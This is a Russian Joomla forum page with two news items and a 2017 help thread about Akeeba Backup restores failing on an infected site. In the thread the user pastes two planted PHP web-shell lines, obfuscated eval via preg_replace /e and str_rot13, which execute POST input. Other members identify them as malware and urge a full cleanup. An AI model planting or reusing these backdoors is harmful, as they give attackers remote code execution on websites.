Новости Joomla

Joomla 6: Автоматические обновления ядра в Joomla

Joomla 6: Автоматические обновления ядра в Joomla

👩‍💻 Joomla 6: Автоматические обновления ядра в Joomla. В октябрьском номере официального журнала Joomla - Joomla Community Magazine вышла статья David Jardin, где рассказывается о внедрении функционала автоматического обновления ядра Joomla.❓Почему сейчас? Joomla же жила как-то 20 лет без автоматических обновлений?Это оказалась самая востребованная за последнее время от пользователей Joomla функция. Но, основная причина внедрения - проблемы безопасности. Всякий раз, когда в новой версии Joomla устраняется уязвимость, злоумышленники начинают анализировать код, чтобы выяснить, какая именно уязвимость была исправлена. И как только они это выясняют - начинается разработка автоматизированных скриптов для взлома как можно большего количества сайтов. Затем доступы к автоматически взломанным сайтам продаются в профильных чатах и ресурсах "пачками" по несколько сотен тысяч или миллионов сайтов. Ваш сайт могли взломать несколько лет назад, но воспользоваться уязвимостью могут не сразу, а тогда, когда у злоумышленников возникнет необходимость. И только после этого вы может быть узнаете об этом.Анализ патча, понимание проблемы и разработка скрипта требуют времени. И если владелец сайта не обновит его до истечения этого срока, сайт может быть взломан. А хакеры действуют быстро! Для критических, легко эксплуатируемых уязвимостей речь идёт о временном окне в 10–12 часов — и этого времени явно недостаточно, чтобы все успели обновить свои сайты.Здесь выходят на первый план автоматизированные обновления: проект Joomla теперь может активно устанавливать обновления (и, следовательно, исправления безопасности) на сайты, чтобы гарантировать, что сайты действительно обновляются вовремя.🕘 От первых идей до реализации прошло 5 лет. И здесь можно вспомнить, как в Joomla 5.1 внедрили TUF - The Update Framework, позволяющий устанавливать защищённое соединение между сайтом и сервером обновлений и исключает возможность supply chain attack (атаки на цепочку поставок).Об особенностях реализации и требованиях к сайту читаем подробнее в статье на JCM.@joomlafeed#joomla #secutiry #jcm

Первый выпуск журнала NorrNext в честь 20-й годовщины Joomla™

Первый выпуск журнала NorrNext в честь 20-й годовщины Joomla™

Первый выпуск журнала NorrNext в честь 20-й годовщины Joomla™. Интервью с волонтёрами 🎈Ну что, друзья, вот и настал этот долгожданный момент. Мы выпустили первое издание собственного журнала под эгидой NorrNext, который включает в себя интервью с видными деятелями сообщества из разных стран и континентов.Общий нарратив: показать, что нас объединяет (Joomla) и узнать больше о людях, которые вносят свой вклад в развитие платформы в своих сообществах. 20 лет — это много. Давайте же узнаем о коллегах 🎁 Первый цикл включает такие страны, как Австрия, Испания, Латвия, Россия, Румыния, Тайланд, Черногория, Чехия.⚙️ С кем интервью: ✔️ Владимир Елисеев 🇷🇺✔️ Дмитрий Рекун 🇱🇻✔️ Дмитрий Цымбал 🇷🇺✔️ Евгений Сивоконь 🇷🇺 ✔️ Сергей Толкачёв 🇷🇺✔️ Dénes Székely 🇷🇴✔️ Jan Pavelka 🇨🇿✔️ Miljan Vujosevic 🇲🇪✔️ Sergio Iglesias 🇪🇸✔️ Sigrid Gramlinger 🇦🇹✔️ Pisan Chueatchatchai 🇹🇭‼️ Новые интервью будут добавляться до конца декабря 2025. Заходите по ссылке время от времени💡👉 Читать далее

0 Пользователей и 1 Гость просматривают эту тему.
  • 19 Ответов
  • 2195 Просмотров
*

Alex GOOD

  • Захожу иногда
  • 210
  • 0 / 0
  • я только учусь...
Помогите пожалуйста. Обновил акеба до последней версии. Понадобилось слить на локальный сервер, чтобы поковырять для внесения поправок.
Сделал резервную копию - в конце как обычно было выдано сообщение о успешном создании резервной копии.
Начинаю поднимать бэкап - как вдруг выскакивает ошибка: http://joxi.ru/KAx9OGGiMqq5br
Не знаю что делать? :( 
*

rkron

  • Захожу иногда
  • 316
  • 7 / 0
Файл недогрузился.  Сделайте еще одну копию.
*

Alex GOOD

  • Захожу иногда
  • 210
  • 0 / 0
  • я только учусь...
пробовал уже раз пять и саму акебу переустанавливал и ничего, все равно одно и тоже...
*

wishlight

  • Гуру
  • 5065
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Странный файл. Что в нем? При распаковке если отключить антивирус?
*

Alex GOOD

  • Захожу иногда
  • 210
  • 0 / 0
  • я только учусь...
странно но по этому пути он есть, но не открыть не скачать его не получается, вернее пишет как скачан, но на самом деле ничего не скачивается... Может вирус какой?
Отключил антивирус и скачал! Вот содержимое:
Код
<?php isset($_POST['ysbidp']) && ($www= $_POST['ysbidp']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');

ОПА и распаковать получилось без ошибки с отключенным антивирусом. Что за прикол? Пробую до конца развернуть сайт...
« Последнее редактирование: 21.03.2017, 16:04:29 от Alex GOOD »
*

wishlight

  • Гуру
  • 5065
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
*

rkron

  • Захожу иногда
  • 316
  • 7 / 0
странно но по этому пути он есть, но не открыть не скачать его не получается, вернее пишет как скачан, но на самом деле ничего не скачивается... Может вирус какой?
Отключил антивирус и скачал! Вот содержимое:
Код
<?php isset($_POST['ysbidp']) && ($www= $_POST['ysbidp']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');

ОПА и распаковать получилось без ошибки с отключенным антивирусом. Что за прикол? Пробую до конца развернуть сайт...
Вирус. Нужно чистить.
*

Alex GOOD

  • Захожу иногда
  • 210
  • 0 / 0
  • я только учусь...
просто очистить содержимое данного файла или вообще удалить? или как-то еще можно сайт прогнать на вирусы?
« Последнее редактирование: 21.03.2017, 18:52:57 от Alex GOOD »
*

pomogu_chem_smogu

  • Осваиваюсь на форуме
  • 16
  • 1 / 0
Это скорей всего из-за вирусов попробуйте почистите и отпишитесь если получится! ;)
*

wishlight

  • Гуру
  • 5065
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Этот файл по идее можно удалить, но он там не один.
*

pomogu_chem_smogu

  • Осваиваюсь на форуме
  • 16
  • 1 / 0
А если попробовать Akeeba переустановить?
*

Alex GOOD

  • Захожу иногда
  • 210
  • 0 / 0
  • я только учусь...
akeba уже переустанавливал - не помогло
через ftp удалил на сайте файл по этому пути.... локально который скачал, когда антивирус включен, открыть не дал, сразу error при открытии, и сразу антивирь его ушатал
думаю чем прогнать сайт... может есть что для Joomla?
*

pomogu_chem_smogu

  • Осваиваюсь на форуме
  • 16
  • 1 / 0
Попробуй удали этот файл!
*

Alex GOOD

  • Захожу иногда
  • 210
  • 0 / 0
  • я только учусь...
удалил и вот кое-что нашел, только дороговато как-то https://www.siteguarding.com/en/antivirus-website-protection-for-joomla
*

Alex GOOD

  • Захожу иногда
  • 210
  • 0 / 0
  • я только учусь...
все удалил, новый бэкап и новая ошибка при распаковке http://joxi.ru/E2pgoRRH9VYagm
*

wishlight

  • Гуру
  • 5065
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Новый файл с вредоносным кодом.
*

Alex GOOD

  • Захожу иногда
  • 210
  • 0 / 0
  • я только учусь...
Видимо так. Вот содержимое:
Код
<?php if(isset($_POST['th6sh'])){($www= $_POST['th6sh']) && @preg_replace('/ad/e','@'.str_rot13('riny').'(@eval(base64_decode($_POST[z0]));)', 'add');}
« Последнее редактирование: 21.03.2017, 22:14:09 от Alex GOOD »
*

Alex GOOD

  • Захожу иногда
  • 210
  • 0 / 0
  • я только учусь...
В общем повторил процедуру порядка 5 раз. Делаю бэкап, при разворачивании ругается на какой-то файл, удаляю и на новый круг. Все файлы в принципе с примерно одинаковым содержимым. Теперь развернул все без проблем. Думаю надо сменить пароли и какую-то доп защиту сделать!
*

rkron

  • Захожу иногда
  • 316
  • 7 / 0
В общем повторил процедуру порядка 5 раз. Делаю бэкап, при разворачивании ругается на какой-то файл, удаляю и на новый круг. Все файлы в принципе с примерно одинаковым содержимым. Теперь развернул все без проблем. Думаю надо сменить пароли и какую-то доп защиту сделать!
Эти действия бесполезны. Нужно или накатывать на чистую Joomla или айболит Вам в помощь. Вирусы прописываются в js и подобные файлы лишь следствие. Удалите, и появятся новые. Нужно комплексное лечение.
*

flyingspook

  • Живу я здесь
  • 3590
  • 247 / 9
Бэкам можно сделать в ручную файлы и бд, или через Akeeba Backup лучше отдельно zip файлов и отдельно бэкап бд, или вместе все в zip, а на локалке все развернуть в ручную, а сайт лечить надо.
удалил и вот кое-что нашел, только дороговато как-то
76$ это даром, но вам это не поможет как и всем остальным в прочем
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Проблема с Akeeba Backup

Автор Lemonez

Ответов: 6
Просмотров: 3138
Последний ответ 29.03.2025, 13:06:45
от sivers
Akeeba Admin Tools Core - не могу снять пароль

Автор AlexP750

Ответов: 1
Просмотров: 2214
Последний ответ 06.10.2022, 18:15:14
от Mitriy
Гостевая книга Easybook Reloaded RUS

Автор dynamit

Ответов: 122
Просмотров: 73318
Последний ответ 10.01.2022, 08:58:53
от mondee
Как правильно изменить Akeeba Backup Professional на Akeeba Backup Core?

Автор epson950

Ответов: 0
Просмотров: 1201
Последний ответ 08.07.2021, 13:06:30
от epson950
Ошибка при желании создать резервную копия в Akeeba Backup

Автор yura21r3

Ответов: 1
Просмотров: 2006
Последний ответ 04.05.2019, 16:23:23
от draff